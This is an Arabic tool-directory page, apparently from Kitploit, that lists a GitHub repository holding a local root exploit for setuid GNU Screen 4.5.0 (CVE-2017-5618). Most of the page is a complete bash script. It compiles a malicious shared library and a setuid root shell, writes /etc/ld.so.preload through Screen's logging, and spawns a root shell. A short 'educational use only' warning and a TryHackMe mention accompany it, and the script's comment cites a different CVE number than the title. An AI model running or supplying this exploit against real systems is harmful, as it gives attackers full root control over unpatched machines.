Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-5618-Screen-4.5.0-Root — استغلال رفع الامتيازات المحلية لـ GNU Screen 4.5.0 (CVE-2017-5618). يستغل ثغرة في ميزة التسجيل لاختطاف تحميل المكتبات المشتركة والحصول على صلاحيات الجذر عبر التلاعب بـ ld.so.preload. الضعيف: Screen 4.5.0 (SUID) تم الإصلاح في: Screen 4.6.0+ | Kitploit
أدوات/GitHubGitHub/rxdarkee/cve-2017-5618-screen-4.5.0-root
تصعيد الامتيازاتالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubrxdarkee/cve-2017-5618-screen-4.5.0-root

CVE-2017-5618-Screen-4.5.0-Root

استغلال رفع الامتيازات المحلية لـ GNU Screen 4.5.0 (CVE-2017-5618). يستغل ثغرة في ميزة التسجيل لاختطاف تحميل المكتبات المشتركة والحصول على صلاحيات الجذر عبر التلاعب بـ ld.so.preload. الضعيف: Screen 4.5.0 (SUID) تم الإصلاح في: Screen 4.6.0+

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 10 أشهرلم تتم المراجعة بعد

GNU Screen 4.5.0 استغلال تصعيد الامتيازات المحلي (CVE-2017-5618)

📌 نظرة عامة

استغلال تصعيد الامتيازات المحلي لـ GNU Screen 4.5.0 والذي يختطف تحميل المكتبات المشتركة للحصول على وصول الجذر عبر التلاعب بـ ld.so.preload.

🔧 التفاصيل التقنية

الثغرة: CVE-2017-5618

النوع: اختطاف المكتبات المشتركة عبر ld.so.preload

المتأثر: GNU Screen 4.5.0 حصريًا

تم الإصلاح في: GNU Screen 4.6.0+

🎪 سيرك الثغرات

CVE: 2017-5618 🎯

الخطأ: Screen 4.5.0 ينشئ ملفات سجل بأذونات خطيرة

السحر: نخدعه لإنشاء /etc/ld.so.preload الذي يحمل مكتبتنا الخبيثة

الحمولة: شيل جذر فوري! 🐚

السكربت 🗒️

root@kitploit:~
#!/bin/bash
# exploit.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# CVE-2016-8781
# tested on debian jessie (8.6) with screen 4.5.
# 0xHackers - Darke
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
echo "[+] Triggering..."
screen -ls 
/tmp/rootshell
            

لقطات الشاشة

التحقق من إصدار Screen الضعيف.

Screen version detected

إنشاء الملف وإعطاء الأذونات المطلوبة.

Making

تم الحصول على وصول الجذر.

Root

تم الحصول على شيل الجذر - تحكم كامل في النظام

⚠️ تحذير

للاستخدام التعليمي فقط! ⚠️ لا تكن طفل سكربت - استخدم هذا فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

تم الاختبار على

غرفة TryHackMe KOTH - Food

تنزيل الأداة